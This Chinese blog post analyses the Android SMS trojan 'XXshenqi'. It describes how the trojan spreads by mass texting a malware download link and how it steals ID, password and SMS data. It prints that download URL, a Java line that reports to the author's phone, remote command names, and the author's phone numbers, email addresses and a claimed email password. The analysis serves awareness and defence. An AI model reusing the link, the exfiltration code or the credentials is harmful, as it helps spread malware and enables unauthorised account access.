超级病毒“xxshenqi.[XX神器]”到底有多牛

该木马从8月2日同时也是“七夕”,“XX神器”借节日疯狂传播。
以下6大主要危害:
      1、群发诈骗短信。读取手机通讯录中的联系人列表,并向所有联系人群发包括木马下载地址的欺诈短信,极具扩散能力。短信中会显示短信接受者的姓名,极具迷惑性:[联系人姓名] + “看这个,” +”http://cdn.yyupload.com/down/4279193/XXshenqi.apk”
      2、窃取隐私信息。“XX神器”打开后,会要求用户填写用户名、密码、姓名及身份证号等隐私信息,提交后会发到一个指定的手机号码上。
      3、可拦截特定号码并且解释指令,可伪造或删除任何短信内容。
      4、会转发手机中所有短信到指定的手机号码。
      5、得到作者远程指令后,将隐私信息发送指定邮箱。
      6“XX神器”安装时会同时释放具备更多恶意行为的恶意子包,恶意子包一旦安装,会将图标隐藏,即使删除了“XX神器”,木马依然可以作恶。

@@@1.首先获取手机中所有的联系人信息,然后群发一条短信,内容如下:
[联系人姓名] + “看这个,” +”http://cdn.yyupload.com/down/4279193/XXshenqi.apk”骗取本机联系人点击恶意链接下载病毒进行传播。
发送成功后,执行:
SmsManager.getDefault().sendTextMessage(“18670259904″, null, “XXshenqi 群发链接OK”, null, null);

 


 

@@@2.在MainActivity中弹出 showInstallConfirmDialog安装一个com.example.com.android.trogoogle的文件,这个文件存在于xxshenqi.apk解压后文件的assets目录下。

安装木马后,会自动隐藏图标。

 


 
 
@@@3.同时弹出一个登录框,只不过这个是个幌子,怎么输入都会出现密码错误或者账户不存在,将用户导入到一个注册页面:RegisterActivity中,如果点击了注册按钮那么很不幸,你的信息就会发送到作者的手机上。
 

 

@@@4.子包安装后隐藏图标,xxshenqi.apk的任务基本是完成了,即使用户卸载也无所谓,因为木马已经在刚开始就被释放了,打开了一个ListenMessageService的服务,在后台运行,这才是他的终极目的.

 
 
@@@5.拦截特定号码,解释指令

 


readmessage 发送邮件命令,sendmessage发送短信命令
 
makemessage伪造短信命令,sendlink发送连接的命令
 
 
@@@6.开启SmsObserver监控短信

 
 

@@@7.判断是否是淘宝网购信息和普通短信发送到指定号码:18163657397


 
@@@8.MySendEmailService这个服务就是给作者发送电子邮件。邮箱地址:a137736513@qq.com,a137736513@qq.com,137736513@qq.com
密码是:lishulili.

说的这里小编只能对作者说“No zuo no die. ”


 
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值